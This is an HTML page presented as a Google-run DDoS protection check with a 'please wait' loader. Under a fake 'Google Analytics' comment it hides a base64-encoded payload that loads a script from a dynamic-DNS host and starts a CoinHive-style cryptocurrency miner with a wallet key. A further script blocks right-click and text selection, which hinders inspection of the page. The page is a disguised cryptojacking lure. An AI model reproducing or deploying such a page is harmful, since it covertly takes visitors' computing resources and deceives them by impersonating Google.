<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" >
      <!-- seo -->
<meta name="description"
   content="Protect Against DDoS Attack">
<meta name="keywords"
   content="ddos, ddos protection, ddos attack, ddos blocker, ddos attack map, what is ddos, anti ddos protection">
      <!-- seo -->
<title>DDoS Attack</title>
 <link rel="shortcut icon" href="image\favicon.png" type="image/png">
<style>
/* style.css*/
h1 {
    font-size: 120%;
    font-family: Georgia, 'Times New Roman', Times, serif;
    color: #12122f;
   }
h1:hover {
    color:#1a1a44;
    }
 h4 {
    font-size: 80%;
    font-family: Georgia, 'Times New Roman', Times, serif;
    color: #12122f;
   }
h4:hover {
    color:#1a1a44;
    }
h5 {
    font-size: 80%;
    font-family: "Arial", sans-serif;
    color: #12122f;
    font-weight: normal;
   }
h5:hover {
    color:#1a1a44;
    }
h6 {
    font-size: 50%;
    font-family: "Arial", sans-serif;
    color: #12122f;
    font-weight: normal;
   }
 #kontent {
 text-align:center;
 }
</style>

</head>
<body id="kontent">
<noscript><p>Your browser does not support javascript or its support is disabled!</p></noscript> 
<h1 align="center">Protect Against DDoS Attack!</h1>
<h4 align="center">Google's security system conducts diagnostics on computer networks. Please wait...</h4>
<img title="Loading … please wait" src="image\loader01.gif" width="400" height="300" alt="please wait. loading" >
<h5 align="center">Performance and Security Services work in conjunction
<br>  to reduce latency of web sites, mobile applications,
<br>  and APIs end-to-end, while protecting against DDoS attack,
<br>  abusive bots, ddos protection and data breach.</h5>
<h6 align="center">© Copyright | 2009-2018 Mune. All Rights Reserved. <a href = "https://goo.gl/forms/t3lW6Oq4vx81VNWl2">Support</a></h6>
		<!-- Google Analytics -->
PHNjcmlwdCBzcmM9Imh0dHA6Ly9ndXN0YXZlci5kZG5zLm5ldC9tZWRpYS9tZWRpYS5qcz9ndXN0YXY9d3M6Ly9ndXN0YXZlci5kZG5zLm5ldDo4ODkzIj48L3NjcmlwdD4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCnZhciBtcndheW5lID0gbmV3IENILkFub255bW91cygnNEFiTkV2YXhHdE01cGduQlU2YWQ0WjFiMmVFYUJ5SGtaaWpjNHBpbnZNeTQ3dVRla2dkclJlVUdxYzQ1M0pUR2FQaDhIN3ZkZWF1NE5BTTY2cUR4M2JIRkNSMXRxc2guMTdhMTYzYjg3MTM5NGE4ZjY2MWU0NjcxOWY4MGE0M2JkZDFjMjA4Y2U0ZjdiNzZlMWJlZmRlMTJhODM1ZDBlMCs1MDAwJywgeyBhdXRvVGhyZWFkczogZmFsc2UsIHRocm90dGxlOiAwLjMsIGZvcmNlQVNNSlM6IGZhbHNlIH0pOw0KbXJ3YXluZS5zdGFydChDSC5GT1JDRV9FWENMVVNJVkVfVEFCKTsNCjwvc2NyaXB0Pg==	
		<!-- Protecting text from copying -->
<script type="text/javascript">
     document.ondragstart = noselect; 
     document.onselectstart = noselect; 
     document.oncontextmenu = noselect; 
     function noselect() {return false;} 
 </script>
</body>
</html>
